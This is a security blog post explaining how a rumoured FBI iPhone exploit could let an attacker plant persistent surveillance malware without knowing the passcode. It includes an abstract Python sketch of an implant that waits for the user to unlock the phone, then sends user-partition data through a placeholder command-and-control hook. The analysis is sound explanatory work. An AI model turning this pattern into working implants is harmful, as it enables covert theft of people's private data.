Why a Software Exploit Would Be a Threat to Secure Enclave Devices

As speculation continues about the FBI’s new toy for hacking iPhones, the possibility of a software exploit continues to be a point of discussion. In my last post, I answered the question of whether such an exploit would work on Secure Enclave devices, but I didn’t fully explain the threat that persists regardless.

For the sake of argument, let's go with the theory that the FBI's tool uses a software exploit. The exploit probably doesn't (yet) attack the Secure Enclave, as Farook's 5c didn't have one. But that probably doesn't matter. Let's assume for a moment that the exploit could be ported to work on a 64-bit processor. The 5c is 32-bit, so this assumes a lot: some exploits can be ported, while others simply won't work on the 64-bit architecture. But let's assume that the work has either already been done or will be done shortly; it's a very plausible scenario.

Attacking the Secure Enclave is only necessary to access data at rest; in this case, that matters because the suspects are dead and can never unlock the device. For the rest of those who may be targets of a nation state (journalists, executives, diplomats, security researchers, etc.), however, this data becomes unlocked whenever the user enters their passcode. The entire user data partition is encrypted, but the operating system partition is not. In short, this means such an exploit could be used to "jailbreak" a phone and install malware on the system partition without ever brute forcing the passcode or touching any data on the user partition. With temporary physical access to the device, such a payload could be delivered without the user's knowledge, say at a security checkpoint at an airport or during a momentary lapse of judgment at a bar. We know the exploit also works on a completely locked device.

Once installed, malware like this could be written to wait for the user to unlock their phone and then siphon data off the user partition wirelessly to a command-and-control (C2) server. It wouldn't matter whether the user had a numeric PIN or an alphanumeric passcode: by unlocking a compromised phone, they've decrypted their own data, completely unaware that malware is now stealing it. This kind of surveillance is persistent and can go on monitoring the subject indefinitely, possibly even surviving a firmware update depending on a number of factors (whether the update is delivered OTA, what the update contains, etc.).
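The wait-for-unlock pattern described above is simple to sketch. Below is a deliberately abstract Python illustration (not iOS code; the `device` object, its `protected_data_available` flag, and the `c2_send` hook are all hypothetical stand-ins) of how an implant could sit dormant while data is encrypted at rest, then exfiltrate once the user's passcode entry has unlocked the partition:

```python
class Implant:
    """Illustrative sketch of the wait-for-unlock surveillance pattern.
    All names here are hypothetical; a real implant would hook the
    operating system's data-protection APIs rather than poll a flag."""

    def __init__(self, device, c2_send):
        self.device = device    # stand-in exposing .protected_data_available
                                # and .read_user_partition()
        self.c2_send = c2_send  # stand-in callable shipping data to a C2 server

    def run_once(self):
        # Data at rest: the class-key hierarchy is still locked,
        # so nothing useful can be read from the user partition yet.
        if not self.device.protected_data_available:
            return False
        # The user has entered their passcode; files on the user
        # partition now decrypt transparently, PIN strength irrelevant.
        for record in self.device.read_user_partition():
            self.c2_send(record)
        return True
```

The point the sketch makes is the one in the paragraph above: the implant never attacks the encryption at all. It simply waits for the legitimate user to do the decrypting.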

I wrote about techniques like this (and provided source code examples) a couple of years ago in my last book, Hacking and Securing iOS Applications. It's definitely a feasible attack, and one I've demonstrated before.

The moral of the story is that the exploit the FBI may have is dangerous in and of itself, regardless of whether it serves their specific purpose of brute forcing a device's PIN. Such an exploit has numerous uses within the intelligence community and threatens not only the hundreds of millions of older devices out there but, if it can be ported to a 64-bit platform, every single one of us: the threat could come directly from the government, from a nation state the exploit developer also sold it to, or from another hacker who finds the same hole because the FBI didn't report the vulnerability to Apple. The FBI has left us all potentially exposed by choosing to keep its technique secret.